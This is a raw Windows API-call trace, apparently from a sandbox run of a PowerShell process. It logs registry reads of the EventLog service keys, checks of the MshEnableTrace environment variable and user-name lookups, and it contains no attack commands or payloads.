	[0598.787] CoTaskMemFree (pv=0x34fcd0) 
	[0598.787] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd2bc, lpData=0x0, lpcbData=0xcd2b8*=0x0 | out: lpType=0xcd2bc*=0x1, lpData=0x0, lpcbData=0xcd2b8*=0x8) returned 0x0
	[0598.787] CoTaskMemAlloc (cb=0xc) returned 0x348220
	[0598.787] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd28c, lpData=0x348220, lpcbData=0xcd288*=0x8 | out: lpType=0xcd28c*=0x1, lpData="2.0", lpcbData=0xcd288*=0x8) returned 0x0
	[0598.787] CoTaskMemFree (pv=0x348220) 
	[0598.789] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0598.789] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0598.789] CoTaskMemFree (pv=0x291700) 
	[0600.029] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0600.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0600.030] CoTaskMemFree (pv=0x291700) 
	[0600.035] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd358 | out: phkResult=0xcd358*=0x2f8) returned 0x0
	[0600.042] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd2cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd2c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd2cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd2c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0600.042] CoTaskMemFree (pv=0x0) 
	[0600.043] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0600.043] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x0, lpName=0x34fcd0, lpcchName=0xcd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0600.043] CoTaskMemFree (pv=0x34fcd0) 
	[0600.043] CoTaskMemFree (pv=0x0) 
	[0600.043] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0600.043] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x1, lpName=0x34fcd0, lpcchName=0xcd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0600.043] CoTaskMemFree (pv=0x34fcd0) 
	[0600.043] CoTaskMemFree (pv=0x0) 
	[0600.043] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0600.043] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x2, lpName=0x34fcd0, lpcchName=0xcd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0600.043] CoTaskMemFree (pv=0x34fcd0) 
	[0600.043] CoTaskMemFree (pv=0x0) 
	[0600.043] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0600.043] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x3, lpName=0x34fcd0, lpcchName=0xcd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0600.043] CoTaskMemFree (pv=0x34fcd0) 
	[0600.043] CoTaskMemFree (pv=0x0) 
	[0600.044] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0600.044] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x4, lpName=0x34fcd0, lpcchName=0xcd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0600.044] CoTaskMemFree (pv=0x34fcd0) 
	[0600.044] CoTaskMemFree (pv=0x0) 
	[0600.044] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0600.044] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x5, lpName=0x34fcd0, lpcchName=0xcd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0600.044] CoTaskMemFree (pv=0x34fcd0) 
	[0600.044] CoTaskMemFree (pv=0x0) 
	[0600.044] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0600.044] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x6, lpName=0x34fcd0, lpcchName=0xcd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0600.044] CoTaskMemFree (pv=0x34fcd0) 
	[0600.044] CoTaskMemFree (pv=0x0) 
	[0600.044] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0600.044] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x7, lpName=0x34fcd0, lpcchName=0xcd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0600.044] CoTaskMemFree (pv=0x34fcd0) 
	[0600.044] CoTaskMemFree (pv=0x0) 
	[0600.044] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0600.045] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x8, lpName=0x34fcd0, lpcchName=0xcd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0600.045] CoTaskMemFree (pv=0x34fcd0) 
	[0600.045] CoTaskMemFree (pv=0x0) 
	[0600.045] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x2fc) returned 0x0
	[0600.045] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x0) returned 0x2
	[0600.045] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x308) returned 0x0
	[0600.045] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x0) returned 0x2
	[0600.045] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x30c) returned 0x0
	[0600.045] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x0) returned 0x2
	[0600.045] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x310) returned 0x0
	[0600.046] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x0) returned 0x2
	[0600.046] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x328) returned 0x0
	[0600.046] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x0) returned 0x2
	[0600.046] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x338) returned 0x0
	[0600.046] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x0) returned 0x2
	[0600.046] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x33c) returned 0x0
	[0600.046] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x0) returned 0x2
	[0600.046] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x340) returned 0x0
	[0600.046] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x0) returned 0x2
	[0600.047] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x344) returned 0x0
	[0600.047] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3b8 | out: phkResult=0xcd3b8*=0x348) returned 0x0
	[0600.047] RegCloseKey (hKey=0x348) returned 0x0
	[0600.047] RegCloseKey (hKey=0x2f8) returned 0x0
	[0600.048] RegCloseKey (hKey=0x344) returned 0x0
	[0600.057] CoTaskMemAlloc (cb=0x804) returned 0x1b981380
	[0600.058] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b981380, nSize=0xcd5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd5c8) returned 0x1
	[0600.059] CoTaskMemFree (pv=0x1b981380) 
	[0600.060] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0600.060] GetUserNameW (in: lpBuffer=0x1b981ff0, pcbBuffer=0xcd608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd608) returned 1
	[0601.703] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.117] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd308 | out: phkResult=0xcd308*=0x34c) returned 0x0
	[0603.117] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd27c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd278, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd27c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd278*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.117] CoTaskMemFree (pv=0x0) 
	[0603.117] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.117] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.117] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.117] CoTaskMemFree (pv=0x0) 
	[0603.117] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.117] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.117] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.117] CoTaskMemFree (pv=0x0) 
	[0603.117] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.117] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.117] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.118] CoTaskMemFree (pv=0x0) 
	[0603.118] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.118] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.118] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.118] CoTaskMemFree (pv=0x0) 
	[0603.118] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.118] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.118] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.118] CoTaskMemFree (pv=0x0) 
	[0603.118] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.118] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.118] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.118] CoTaskMemFree (pv=0x0) 
	[0603.118] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.118] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.118] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.118] CoTaskMemFree (pv=0x0) 
	[0603.118] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.119] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.119] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.119] CoTaskMemFree (pv=0x0) 
	[0603.119] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.119] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.119] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.119] CoTaskMemFree (pv=0x0) 
	[0603.119] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x350) returned 0x0
	[0603.119] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.119] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x354) returned 0x0
	[0603.119] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.119] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x358) returned 0x0
	[0603.120] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.120] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x35c) returned 0x0
	[0603.120] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.120] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x360) returned 0x0
	[0603.120] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.120] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x364) returned 0x0
	[0603.120] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.121] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x368) returned 0x0
	[0603.121] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.121] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x36c) returned 0x0
	[0603.121] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.121] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x370) returned 0x0
	[0603.121] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x374) returned 0x0
	[0603.121] RegCloseKey (hKey=0x374) returned 0x0
	[0603.122] RegCloseKey (hKey=0x34c) returned 0x0
	[0603.122] RegCloseKey (hKey=0x370) returned 0x0
	[0603.123] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd308 | out: phkResult=0xcd308*=0x370) returned 0x0
	[0603.123] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd27c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd278, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd27c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd278*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.123] CoTaskMemFree (pv=0x0) 
	[0603.123] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.123] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x0, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.123] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.123] CoTaskMemFree (pv=0x0) 
	[0603.123] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.124] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x1, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.124] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.124] CoTaskMemFree (pv=0x0) 
	[0603.124] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.124] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x2, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.124] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.124] CoTaskMemFree (pv=0x0) 
	[0603.124] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.124] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x3, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.124] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.124] CoTaskMemFree (pv=0x0) 
	[0603.124] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.124] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x4, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.124] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.125] CoTaskMemFree (pv=0x0) 
	[0603.125] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.125] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x5, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.125] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.125] CoTaskMemFree (pv=0x0) 
	[0603.125] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.125] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x6, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.125] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.125] CoTaskMemFree (pv=0x0) 
	[0603.125] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.125] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x7, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.125] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.125] CoTaskMemFree (pv=0x0) 
	[0603.125] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0603.126] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x8, lpName=0x1b981ff0, lpcchName=0xcd308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.126] CoTaskMemFree (pv=0x1b981ff0) 
	[0603.126] CoTaskMemFree (pv=0x0) 
	[0603.126] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x34c) returned 0x0
	[0603.126] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.126] RegOpenKeyExW (in: hKey=0x370, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x374) returned 0x0
	[0603.126] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.126] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x378) returned 0x0
	[0603.126] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.127] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x37c) returned 0x0
	[0603.127] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.127] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x380) returned 0x0
	[0603.127] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.127] RegOpenKeyExW (in: hKey=0x370, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x384) returned 0x0
	[0603.127] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.127] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x388) returned 0x0
	[0603.127] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
